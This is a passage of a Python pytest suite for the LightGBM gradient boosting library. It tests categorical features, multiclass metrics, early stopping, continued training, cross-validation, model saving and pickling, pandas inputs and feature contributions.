assert pred[0] == pytest.approx(pred[1])
assert pred[-1] == pytest.approx(pred[0])
ret = roc_auc_score(y_train, pred)
assert ret > 0.83
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_categorical_handle():
x = [0, 1, 2, 3, 4, 5, 6, 7]
y = [0, 1, 0, 1, 0, 1, 0, 1]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'min_data_per_group': 1,
'cat_smooth': 1,
'cat_l2': 0,
'max_cat_to_onehot': 1,
'zero_as_missing': True,
'categorical_column': 0
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_categorical_handle_na():
x = [0, np.nan, 0, np.nan, 0, np.nan]
y = [0, 1, 0, 1, 0, 1]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'min_data_per_group': 1,
'cat_smooth': 1,
'cat_l2': 0,
'max_cat_to_onehot': 1,
'zero_as_missing': False,
'categorical_column': 0
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_categorical_non_zero_inputs():
x = [1, 1, 1, 1, 1, 1, 2, 2]
y = [1, 1, 1, 1, 1, 1, 0, 0]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'min_data_per_group': 1,
'cat_smooth': 1,
'cat_l2': 0,
'max_cat_to_onehot': 1,
'zero_as_missing': False,
'categorical_column': 0
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_multiclass():
X, y = load_digits(n_class=10, return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'multiclass',
'metric': 'multi_logloss',
'num_class': 10,
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, params=params)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, params=params)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = multi_logloss(y_test, gbm.predict(X_test))
assert ret < 0.16
assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(ret)
def test_multiclass_rf():
X, y = load_digits(n_class=10, return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'boosting_type': 'rf',
'objective': 'multiclass',
'metric': 'multi_logloss',
'bagging_freq': 1,
'bagging_fraction': 0.6,
'feature_fraction': 0.6,
'num_class': 10,
'num_leaves': 50,
'min_data': 1,
'verbose': -1,
'gpu_use_dp': True
}
lgb_train = lgb.Dataset(X_train, y_train, params=params)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, params=params)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = multi_logloss(y_test, gbm.predict(X_test))
assert ret < 0.23
assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(ret)
def test_multiclass_prediction_early_stopping():
X, y = load_digits(n_class=10, return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'multiclass',
'metric': 'multi_logloss',
'num_class': 10,
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, params=params)
gbm = lgb.train(params, lgb_train,
num_boost_round=50)
pred_parameter = {"pred_early_stop": True,
"pred_early_stop_freq": 5,
"pred_early_stop_margin": 1.5}
ret = multi_logloss(y_test, gbm.predict(X_test, **pred_parameter))
assert ret < 0.8
assert ret > 0.6 # loss will be higher than when evaluating the full model
pred_parameter["pred_early_stop_margin"] = 5.5
ret = multi_logloss(y_test, gbm.predict(X_test, **pred_parameter))
assert ret < 0.2
def test_multi_class_error():
X, y = load_digits(n_class=10, return_X_y=True)
params = {'objective': 'multiclass', 'num_classes': 10, 'metric': 'multi_error',
'num_leaves': 4, 'verbose': -1}
lgb_data = lgb.Dataset(X, label=y)
est = lgb.train(params, lgb_data, num_boost_round=10)
predict_default = est.predict(X)
results = {}
est = lgb.train(dict(params, multi_error_top_k=1), lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
predict_1 = est.predict(X)
# check that default gives same result as k = 1
np.testing.assert_allclose(predict_1, predict_default)
# check against independent calculation for k = 1
err = top_k_error(y, predict_1, 1)
assert results['training']['multi_error'][-1] == pytest.approx(err)
# check against independent calculation for k = 2
results = {}
est = lgb.train(dict(params, multi_error_top_k=2), lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
predict_2 = est.predict(X)
err = top_k_error(y, predict_2, 2)
assert results['training']['multi_error@2'][-1] == pytest.approx(err)
# check against independent calculation for k = 10
results = {}
est = lgb.train(dict(params, multi_error_top_k=10), lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
predict_3 = est.predict(X)
err = top_k_error(y, predict_3, 10)
assert results['training']['multi_error@10'][-1] == pytest.approx(err)
# check cases where predictions are equal
X = np.array([[0, 0], [0, 0]])
y = np.array([0, 1])
lgb_data = lgb.Dataset(X, label=y)
params['num_classes'] = 2
results = {}
lgb.train(params, lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
assert results['training']['multi_error'][-1] == pytest.approx(1)
results = {}
lgb.train(dict(params, multi_error_top_k=2), lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
assert results['training']['multi_error@2'][-1] == pytest.approx(0)
def test_auc_mu():
# should give same result as binary auc for 2 classes
X, y = load_digits(n_class=10, return_X_y=True)
y_new = np.zeros((len(y)))
y_new[y != 0] = 1
lgb_X = lgb.Dataset(X, label=y_new)
params = {'objective': 'multiclass',
'metric': 'auc_mu',
'verbose': -1,
'num_classes': 2,
'seed': 0}
results_auc_mu = {}
lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc_mu)
params = {'objective': 'binary',
'metric': 'auc',
'verbose': -1,
'seed': 0}
results_auc = {}
lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc)
np.testing.assert_allclose(results_auc_mu['training']['auc_mu'], results_auc['training']['auc'])
# test the case where all predictions are equal
lgb_X = lgb.Dataset(X[:10], label=y_new[:10])
params = {'objective': 'multiclass',
'metric': 'auc_mu',
'verbose': -1,
'num_classes': 2,
'min_data_in_leaf': 20,
'seed': 0}
results_auc_mu = {}
lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc_mu)
assert results_auc_mu['training']['auc_mu'][-1] == pytest.approx(0.5)
# test that weighted data gives different auc_mu
lgb_X = lgb.Dataset(X, label=y)
lgb_X_weighted = lgb.Dataset(X, label=y, weight=np.abs(np.random.normal(size=y.shape)))
results_unweighted = {}
results_weighted = {}
params = dict(params, num_classes=10, num_leaves=5)
lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_unweighted)
lgb.train(params, lgb_X_weighted, num_boost_round=10, valid_sets=[lgb_X_weighted],
evals_result=results_weighted)
assert results_weighted['training']['auc_mu'][-1] < 1
assert results_unweighted['training']['auc_mu'][-1] != results_weighted['training']['auc_mu'][-1]
# test that equal data weights give same auc_mu as unweighted data
lgb_X_weighted = lgb.Dataset(X, label=y, weight=np.ones(y.shape) * 0.5)
lgb.train(params, lgb_X_weighted, num_boost_round=10, valid_sets=[lgb_X_weighted],
evals_result=results_weighted)
assert results_unweighted['training']['auc_mu'][-1] == pytest.approx(
results_weighted['training']['auc_mu'][-1], abs=1e-5)
# should give 1 when accuracy = 1
X = X[:10, :]
y = y[:10]
lgb_X = lgb.Dataset(X, label=y)
params = {'objective': 'multiclass',
'metric': 'auc_mu',
'num_classes': 10,
'min_data_in_leaf': 1,
'verbose': -1}
results = {}
lgb.train(params, lgb_X, num_boost_round=100, valid_sets=[lgb_X], evals_result=results)
assert results['training']['auc_mu'][-1] == pytest.approx(1)
# test loading class weights
Xy = np.loadtxt(
str(Path(__file__).absolute().parents[2] / 'examples' / 'multiclass_classification' / 'multiclass.train')
)
y = Xy[:, 0]
X = Xy[:, 1:]
lgb_X = lgb.Dataset(X, label=y)
params = {'objective': 'multiclass',
'metric': 'auc_mu',
'auc_mu_weights': [0, 2, 2, 2, 2, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0],
'num_classes': 5,
'verbose': -1,
'seed': 0}
results_weight = {}
lgb.train(params, lgb_X, num_boost_round=5, valid_sets=[lgb_X], evals_result=results_weight)
params['auc_mu_weights'] = []
results_no_weight = {}
lgb.train(params, lgb_X, num_boost_round=5, valid_sets=[lgb_X], evals_result=results_no_weight)
assert results_weight['training']['auc_mu'][-1] != results_no_weight['training']['auc_mu'][-1]
def test_ranking_prediction_early_stopping():
rank_example_dir = Path(__file__).absolute().parents[2] / 'examples' / 'lambdarank'
X_train, y_train = load_svmlight_file(str(rank_example_dir / 'rank.train'))
q_train = np.loadtxt(str(rank_example_dir / 'rank.train.query'))
X_test, _ = load_svmlight_file(str(rank_example_dir / 'rank.test'))
params = {
'objective': 'rank_xendcg',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, group=q_train, params=params)
gbm = lgb.train(params, lgb_train, num_boost_round=50)
pred_parameter = {"pred_early_stop": True,
"pred_early_stop_freq": 5,
"pred_early_stop_margin": 1.5}
ret_early = gbm.predict(X_test, **pred_parameter)
pred_parameter["pred_early_stop_margin"] = 5.5
ret_early_more_strict = gbm.predict(X_test, **pred_parameter)
with pytest.raises(AssertionError):
np.testing.assert_allclose(ret_early, ret_early_more_strict)
def test_early_stopping():
X, y = load_breast_cancer(return_X_y=True)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1
}
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
valid_set_name = 'valid_set'
# no early stopping
gbm = lgb.train(params, lgb_train,
num_boost_round=10,
valid_sets=lgb_eval,
valid_names=valid_set_name,
verbose_eval=False,
early_stopping_rounds=5)
assert gbm.best_iteration == 10
assert valid_set_name in gbm.best_score
assert 'binary_logloss' in gbm.best_score[valid_set_name]
# early stopping occurs
gbm = lgb.train(params, lgb_train,
num_boost_round=40,
valid_sets=lgb_eval,
valid_names=valid_set_name,
verbose_eval=False,
early_stopping_rounds=5)
assert gbm.best_iteration <= 39
assert valid_set_name in gbm.best_score
assert 'binary_logloss' in gbm.best_score[valid_set_name]
def test_continue_train():
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'regression',
'metric': 'l1',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, free_raw_data=False)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, free_raw_data=False)
init_gbm = lgb.train(params, lgb_train, num_boost_round=20)
model_name = 'model.txt'
init_gbm.save_model(model_name)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=30,
valid_sets=lgb_eval,
verbose_eval=False,
# test custom eval metrics
feval=(lambda p, d: ('custom_mae', mean_absolute_error(p, d.get_label()), False)),
evals_result=evals_result,
init_model='model.txt')
ret = mean_absolute_error(y_test, gbm.predict(X_test))
assert ret < 2.0
assert evals_result['valid_0']['l1'][-1] == pytest.approx(ret)
np.testing.assert_allclose(evals_result['valid_0']['l1'], evals_result['valid_0']['custom_mae'])
def test_continue_train_reused_dataset():
X, y = load_boston(return_X_y=True)
params = {
'objective': 'regression',
'verbose': -1
}
lgb_train = lgb.Dataset(X, y, free_raw_data=False)
init_gbm = lgb.train(params, lgb_train, num_boost_round=5)
init_gbm_2 = lgb.train(params, lgb_train, num_boost_round=5, init_model=init_gbm)
init_gbm_3 = lgb.train(params, lgb_train, num_boost_round=5, init_model=init_gbm_2)
gbm = lgb.train(params, lgb_train, num_boost_round=5, init_model=init_gbm_3)
assert gbm.current_iteration() == 20
def test_continue_train_dart():
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'boosting_type': 'dart',
'objective': 'regression',
'metric': 'l1',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, free_raw_data=False)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, free_raw_data=False)
init_gbm = lgb.train(params, lgb_train, num_boost_round=50)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result,
init_model=init_gbm)
ret = mean_absolute_error(y_test, gbm.predict(X_test))
assert ret < 2.0
assert evals_result['valid_0']['l1'][-1] == pytest.approx(ret)
def test_continue_train_multiclass():
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'multiclass',
'metric': 'multi_logloss',
'num_class': 3,
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, params=params, free_raw_data=False)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, params=params, free_raw_data=False)
init_gbm = lgb.train(params, lgb_train, num_boost_round=20)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=30,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result,
init_model=init_gbm)
ret = multi_logloss(y_test, gbm.predict(X_test))
assert ret < 0.1
assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(ret)
def test_cv():
X_train, y_train = load_boston(return_X_y=True)
params = {'verbose': -1}
lgb_train = lgb.Dataset(X_train, y_train)
# shuffle = False, override metric in params
params_with_metric = {'metric': 'l2', 'verbose': -1}
cv_res = lgb.cv(params_with_metric, lgb_train, num_boost_round=10,
nfold=3, stratified=False, shuffle=False,
metrics='l1', verbose_eval=False)
assert 'l1-mean' in cv_res
assert 'l2-mean' not in cv_res
assert len(cv_res['l1-mean']) == 10
# shuffle = True, callbacks
cv_res = lgb.cv(params, lgb_train, num_boost_round=10, nfold=3, stratified=False, shuffle=True,
metrics='l1', verbose_eval=False,
callbacks=[lgb.reset_parameter(learning_rate=lambda i: 0.1 - 0.001 * i)])
assert 'l1-mean' in cv_res
assert len(cv_res['l1-mean']) == 10
# enable display training loss
cv_res = lgb.cv(params_with_metric, lgb_train, num_boost_round=10,
nfold=3, stratified=False, shuffle=False,
metrics='l1', verbose_eval=False, eval_train_metric=True)
assert 'train l1-mean' in cv_res
assert 'valid l1-mean' in cv_res
assert 'train l2-mean' not in cv_res
assert 'valid l2-mean' not in cv_res
assert len(cv_res['train l1-mean']) == 10
assert len(cv_res['valid l1-mean']) == 10
# self defined folds
tss = TimeSeriesSplit(3)
folds = tss.split(X_train)
cv_res_gen = lgb.cv(params_with_metric, lgb_train, num_boost_round=10, folds=folds,
verbose_eval=False)
cv_res_obj = lgb.cv(params_with_metric, lgb_train, num_boost_round=10, folds=tss,
verbose_eval=False)
np.testing.assert_allclose(cv_res_gen['l2-mean'], cv_res_obj['l2-mean'])
# LambdaRank
rank_example_dir = Path(__file__).absolute().parents[2] / 'examples' / 'lambdarank'
X_train, y_train = load_svmlight_file(str(rank_example_dir / 'rank.train'))
q_train = np.loadtxt(str(rank_example_dir / 'rank.train.query'))
params_lambdarank = {'objective': 'lambdarank', 'verbose': -1, 'eval_at': 3}
lgb_train = lgb.Dataset(X_train, y_train, group=q_train)
# ... with l2 metric
cv_res_lambda = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10, nfold=3,
metrics='l2', verbose_eval=False)
assert len(cv_res_lambda) == 2
assert not np.isnan(cv_res_lambda['l2-mean']).any()
# ... with NDCG (default) metric
cv_res_lambda = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10, nfold=3,
verbose_eval=False)
assert len(cv_res_lambda) == 2
assert not np.isnan(cv_res_lambda['ndcg@3-mean']).any()
# self defined folds with lambdarank
cv_res_lambda_obj = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10,
folds=GroupKFold(n_splits=3),
verbose_eval=False)
np.testing.assert_allclose(cv_res_lambda['ndcg@3-mean'], cv_res_lambda_obj['ndcg@3-mean'])
def test_cvbooster():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1,
}
lgb_train = lgb.Dataset(X_train, y_train)
# with early stopping
cv_res = lgb.cv(params, lgb_train,
num_boost_round=25,
early_stopping_rounds=5,
verbose_eval=False,
nfold=3,
return_cvbooster=True)
assert 'cvbooster' in cv_res
cvb = cv_res['cvbooster']
assert isinstance(cvb, lgb.CVBooster)
assert isinstance(cvb.boosters, list)
assert len(cvb.boosters) == 3
assert all(isinstance(bst, lgb.Booster) for bst in cvb.boosters)
assert cvb.best_iteration > 0
# predict by each fold booster
preds = cvb.predict(X_test, num_iteration=cvb.best_iteration)
assert isinstance(preds, list)
assert len(preds) == 3
# fold averaging
avg_pred = np.mean(preds, axis=0)
ret = log_loss(y_test, avg_pred)
assert ret < 0.13
# without early stopping
cv_res = lgb.cv(params, lgb_train,
num_boost_round=20,
verbose_eval=False,
nfold=3,
return_cvbooster=True)
cvb = cv_res['cvbooster']
assert cvb.best_iteration == -1
preds = cvb.predict(X_test)
avg_pred = np.mean(preds, axis=0)
ret = log_loss(y_test, avg_pred)
assert ret < 0.15
def test_feature_name():
X_train, y_train = load_boston(return_X_y=True)
params = {'verbose': -1}
lgb_train = lgb.Dataset(X_train, y_train)
feature_names = [f'f_{i}' for i in range(X_train.shape[-1])]
gbm = lgb.train(params, lgb_train, num_boost_round=5, feature_name=feature_names)
assert feature_names == gbm.feature_name()
# test feature_names with whitespaces
feature_names_with_space = [f'f {i}' for i in range(X_train.shape[-1])]
gbm = lgb.train(params, lgb_train, num_boost_round=5, feature_name=feature_names_with_space)
assert feature_names == gbm.feature_name()
def test_feature_name_with_non_ascii():
X_train = np.random.normal(size=(100, 4))
y_train = np.random.random(100)
# This has non-ascii strings.
feature_names = [u'F_零', u'F_一', u'F_二', u'F_三']
params = {'verbose': -1}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=5, feature_name=feature_names)
assert feature_names == gbm.feature_name()
gbm.save_model('lgb.model')
gbm2 = lgb.Booster(model_file='lgb.model')
assert feature_names == gbm2.feature_name()
def test_save_load_copy_pickle():
def train_and_predict(init_model=None, return_model=False):
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'regression',
'metric': 'l2',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm_template = lgb.train(params, lgb_train, num_boost_round=10, init_model=init_model)
return gbm_template if return_model else mean_squared_error(y_test, gbm_template.predict(X_test))
gbm = train_and_predict(return_model=True)
ret_origin = train_and_predict(init_model=gbm)
other_ret = []
gbm.save_model('lgb.model')
with open('lgb.model') as f: # check all params are logged into model file correctly
assert f.read().find("[num_iterations: 10]") != -1
other_ret.append(train_and_predict(init_model='lgb.model'))
gbm_load = lgb.Booster(model_file='lgb.model')
other_ret.append(train_and_predict(init_model=gbm_load))
other_ret.append(train_and_predict(init_model=copy.copy(gbm)))
other_ret.append(train_and_predict(init_model=copy.deepcopy(gbm)))
with open('lgb.pkl', 'wb') as f:
pickle.dump(gbm, f)
with open('lgb.pkl', 'rb') as f:
gbm_pickle = pickle.load(f)
other_ret.append(train_and_predict(init_model=gbm_pickle))
gbm_pickles = pickle.loads(pickle.dumps(gbm))
other_ret.append(train_and_predict(init_model=gbm_pickles))
for ret in other_ret:
assert ret_origin == pytest.approx(ret)
def test_pandas_categorical():
pd = pytest.importorskip("pandas")
np.random.seed(42) # sometimes there is no difference how cols are treated (cat or not cat)
X = pd.DataFrame({"A": np.random.permutation(['a', 'b', 'c', 'd'] * 75), # str
"B": np.random.permutation([1, 2, 3] * 100), # int
"C": np.random.permutation([0.1, 0.2, -0.1, -0.1, 0.2] * 60), # float
"D": np.random.permutation([True, False] * 150), # bool
"E": pd.Categorical(np.random.permutation(['z', 'y', 'x', 'w', 'v'] * 60),
ordered=True)}) # str and ordered categorical
y = np.random.permutation([0, 1] * 150)
X_test = pd.DataFrame({"A": np.random.permutation(['a', 'b', 'e'] * 20), # unseen category
"B": np.random.permutation([1, 3] * 30),
"C": np.random.permutation([0.1, -0.1, 0.2, 0.2] * 15),
"D": np.random.permutation([True, False] * 30),
"E": pd.Categorical(np.random.permutation(['z', 'y'] * 30),
ordered=True)})
np.random.seed() # reset seed
cat_cols_actual = ["A", "B", "C", "D"]
cat_cols_to_store = cat_cols_actual + ["E"]
X[cat_cols_actual] = X[cat_cols_actual].astype('category')
X_test[cat_cols_actual] = X_test[cat_cols_actual].astype('category')
cat_values = [X[col].cat.categories.tolist() for col in cat_cols_to_store]
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1
}
lgb_train = lgb.Dataset(X, y)
gbm0 = lgb.train(params, lgb_train, num_boost_round=10)
pred0 = gbm0.predict(X_test)
assert lgb_train.categorical_feature == 'auto'
lgb_train = lgb.Dataset(X, pd.DataFrame(y)) # also test that label can be one-column pd.DataFrame
gbm1 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=[0])
pred1 = gbm1.predict(X_test)
assert lgb_train.categorical_feature == [0]
lgb_train = lgb.Dataset(X, pd.Series(y)) # also test that label can be pd.Series
gbm2 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A'])
pred2 = gbm2.predict(X_test)
assert lgb_train.categorical_feature == ['A']
lgb_train = lgb.Dataset(X, y)
gbm3 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A', 'B', 'C', 'D'])
pred3 = gbm3.predict(X_test)
assert lgb_train.categorical_feature == ['A', 'B', 'C', 'D']
gbm3.save_model('categorical.model')
gbm4 = lgb.Booster(model_file='categorical.model')
pred4 = gbm4.predict(X_test)
model_str = gbm4.model_to_string()
gbm4.model_from_string(model_str, False)
pred5 = gbm4.predict(X_test)
gbm5 = lgb.Booster(model_str=model_str)
pred6 = gbm5.predict(X_test)
lgb_train = lgb.Dataset(X, y)
gbm6 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A', 'B', 'C', 'D', 'E'])
pred7 = gbm6.predict(X_test)
assert lgb_train.categorical_feature == ['A', 'B', 'C', 'D', 'E']
lgb_train = lgb.Dataset(X, y)
gbm7 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=[])
pred8 = gbm7.predict(X_test)
assert lgb_train.categorical_feature == []
with pytest.raises(AssertionError):
np.testing.assert_allclose(pred0, pred1)
with pytest.raises(AssertionError):
np.testing.assert_allclose(pred0, pred2)
np.testing.assert_allclose(pred1, pred2)
np.testing.assert_allclose(pred0, pred3)
np.testing.assert_allclose(pred0, pred4)
np.testing.assert_allclose(pred0, pred5)
np.testing.assert_allclose(pred0, pred6)
with pytest.raises(AssertionError):
np.testing.assert_allclose(pred0, pred7) # ordered cat features aren't treated as cat features by default
with pytest.raises(AssertionError):
np.testing.assert_allclose(pred0, pred8)
assert gbm0.pandas_categorical == cat_values
assert gbm1.pandas_categorical == cat_values
assert gbm2.pandas_categorical == cat_values
assert gbm3.pandas_categorical == cat_values
assert gbm4.pandas_categorical == cat_values
assert gbm5.pandas_categorical == cat_values
assert gbm6.pandas_categorical == cat_values
assert gbm7.pandas_categorical == cat_values
def test_pandas_sparse():
pd = pytest.importorskip("pandas")
try:
from pandas.arrays import SparseArray
except ImportError: # support old versions
from pandas import SparseArray
X = pd.DataFrame({"A": SparseArray(np.random.permutation([0, 1, 2] * 100)),
"B": SparseArray(np.random.permutation([0.0, 0.1, 0.2, -0.1, 0.2] * 60)),
"C": SparseArray(np.random.permutation([True, False] * 150))})
y = pd.Series(SparseArray(np.random.permutation([0, 1] * 150)))
X_test = pd.DataFrame({"A": SparseArray(np.random.permutation([0, 2] * 30)),
"B": SparseArray(np.random.permutation([0.0, 0.1, 0.2, -0.1] * 15)),
"C": SparseArray(np.random.permutation([True, False] * 30))})
if pd.__version__ >= '0.24.0':
for dtype in pd.concat([X.dtypes, X_test.dtypes, pd.Series(y.dtypes)]):
assert pd.api.types.is_sparse(dtype)
params = {
'objective': 'binary',
'verbose': -1
}
lgb_train = lgb.Dataset(X, y)
gbm = lgb.train(params, lgb_train, num_boost_round=10)
pred_sparse = gbm.predict(X_test, raw_score=True)
if hasattr(X_test, 'sparse'):
pred_dense = gbm.predict(X_test.sparse.to_dense(), raw_score=True)
else:
pred_dense = gbm.predict(X_test.to_dense(), raw_score=True)
np.testing.assert_allclose(pred_sparse, pred_dense)
def test_reference_chain():
X = np.random.normal(size=(100, 2))
y = np.random.normal(size=100)
tmp_dat = lgb.Dataset(X, y)
# take subsets and train
tmp_dat_train = tmp_dat.subset(np.arange(80))
tmp_dat_val = tmp_dat.subset(np.arange(80, 100)).subset(np.arange(18))
params = {'objective': 'regression_l2', 'metric': 'rmse'}
evals_result = {}
lgb.train(params, tmp_dat_train, num_boost_round=20,
valid_sets=[tmp_dat_train, tmp_dat_val],
verbose_eval=False, evals_result=evals_result)
assert len(evals_result['training']['rmse']) == 20
assert len(evals_result['valid_1']['rmse']) == 20
def test_contribs():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1,
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
assert (np.linalg.norm(gbm.predict(X_test, raw_score=True)
- np.sum(gbm.predict(X_test, pred_contrib=True), axis=1)) < 1e-4)
def test_contribs_sparse():
n_features = 20
n_samples = 100
# generate CSR sparse dataset
X, y = make_multilabel_classification(n_samples=n_samples,
sparse=True,
n_features=n_features,
n_classes=1,
n_labels=2)
y = y.flatten()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'verbose': -1,
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
contribs_csr = gbm.predict(X_test, pred_contrib=True)
assert isspmatrix_csr(contribs_csr)
# convert data to dense and get back same contribs
contribs_dense = gbm.predict(X_test.toarray(), pred_contrib=True)
# validate the values are the same
if platform.machine() == 'aarch64':
np.testing.assert_allclose(contribs_csr.toarray(), contribs_dense, rtol=1, atol=1e-12)
else:
np.testing.assert_allclose(contribs_csr.toarray(), contribs_dense)
assert (np.linalg.norm(gbm.predict(X_test, raw_score=True)
- np.sum(contribs_dense, axis=1)) < 1e-4)
# validate using CSC matrix
X_test_csc = X_test.tocsc()
contribs_csc = gbm.predict(X_test_csc, pred_contrib=True)
assert isspmatrix_csc(contribs_csc)
# validate the values are the same
if platform.machine() == 'aarch64':
np.testing.assert_allclose(contribs_csc.toarray(), contribs_dense, rtol=1, atol=1e-12)
else:
np.testing.assert_allclose(contribs_csc.toarray(), contribs_dense)
def test_contribs_sparse_multiclass():
n_features = 20
n_samples = 100
n_labels = 4
# generate CSR sparse dataset
X, y = make_multilabel_classification(n_samples=n_samples,
sparse=True,
n_features=n_features,
n_classes=1,
n_labels=n_labels)
y = y.flatten()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'multiclass',
'num_class': n_labels,
'verbose': -1,
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
contribs_csr = gbm.predict(X_test, pred_contrib=True)
assert isinstance(contribs_csr, list)
for perclass_contribs_csr in contribs_csr:
assert isspmatrix_csr(perclass_contribs_csr)
# convert data to dense and get back same contribs
contribs_dense = gbm.predict(X_test.toarray(), pred_contrib=True)
# validate the values are the same
contribs_csr_array = np.swapaxes(np.array([sparse_array.toarray() for sparse_array in contribs_csr]), 0, 1)
